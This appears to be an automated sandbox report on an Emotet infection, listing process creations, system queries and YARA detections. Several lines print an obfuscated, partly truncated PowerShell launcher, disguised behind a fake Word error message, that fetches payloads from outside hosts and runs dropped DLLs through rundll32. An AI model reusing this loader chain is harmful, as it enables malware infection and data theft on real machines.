KwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',WoLqYWepjKvdu	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',yTCLpaeQtdZh	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',ENdgueltfLPhAUL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',vtkOSGpvF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',#1	Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC	Jump to behavior

Language, Device and Operating System Detection:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0000000F.00000002.2108207451.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102924374.0000000000660000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102828167.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2094445834.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2095209420.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2097508616.0000000000300000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2101092569.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2108344528.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2338438182.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102745390.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2100869950.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2107877116.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2099763419.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2094474454.0000000000740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2098058880.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2101004097.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2098090844.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2108318970.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2338458694.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2095115818.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2095854537.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2107894176.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2099872528.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2098968815.0000000000140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2092243778.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.660000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.740000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.660000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.410000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.740000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.5a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
